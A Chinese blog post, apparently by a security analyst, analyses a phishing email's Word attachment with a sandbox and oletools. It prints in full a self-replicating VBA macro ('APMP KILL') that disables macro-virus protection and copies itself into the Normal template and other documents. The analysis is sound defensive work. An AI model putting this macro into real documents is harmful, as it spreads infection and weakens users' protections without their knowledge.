一个搞笑的宏病毒apmp kill
今天公司的没什么乱用的沙箱又报警了,还是老样子,钓鱼邮件。
黄老师把邮件发过来,我看了下
标题是xxx会议通知,附件一个doc,一个rar:
会议通知,看上去确实比较可疑。先用winhex打开rar。
只有ace格式才会被恶意解析。再看内容是3个jpg。看上去没啥问题。好下一个。
再看doc。
处理doc的原则是千万别在实体机上点开任何doc,教训太惨痛……我这台机器又没有装虚拟环境,借用微步云沙箱看看。。。。修改文件名,上传。这里必须注意涉密文件万不能上传。
一看吓一跳。
难道沙箱办了回人事?
再一看代码,这有短短的一小段
这里吐槽下微步,解析d0cf格式文件是成熟的技术了,ole段的解析还是灰色,不知是何道理。
解出来的代码也是缩在一起毫无可读性,排个版不行啊?不过这么一小段代码能干什么?微步把代码导全了吗?有点吃不准。
想了想还是装个oletools吧,以后分析起来也方便。python是现成的,先装pip,方法在此,再装oletools,说明在此。注意python3的环境要用pip3安装。
用命令 olevba [文件路径] >[导出文件路径],获得代码,真的只有20行。。。
'APMP
'KILL
Private Sub Document_Open()
On Error Resume Next
Application.DisplayStatusBar = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then _
Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
With Host
If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, MyCode
If ThisDocument = NormalTemplate Then _
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End With
End Sub
好大一个KILL……仔细一看这分明是某个叫apmp宏病毒的免疫程序啊!很有想法,发现宏病毒了就把代码删了,在把自己填上去……但这代码看上去非常的……野路子感……有种以毒攻毒的感觉。
网上翻到了apmp宏病毒的原始代码,我看了下...............我倒
这根本没啥两样啊!原来免疫程序是用病毒代码改的啊-_-!我是比较佩服作者的脑洞的,为了免疫一个病毒,改造出了另一个病毒……我服了。
感想有几个:
- 公司的沙箱真的没有任何卵用,天天报这些狗屁倒灶的东西。我测试ace漏洞之流从来不报。
- 杀软静态扫描结果是瞎讲八讲,什么tojan.gen,macro.thus,一搜都吓死人。其实一看就是个恶作剧代码。
- 微步的云沙箱ole的分析方面还有提升的空间。
- 浪费了我一个上午, 其实大部分时间都在装环境。
- 病毒四奇葩,免疫程序也是奇葩。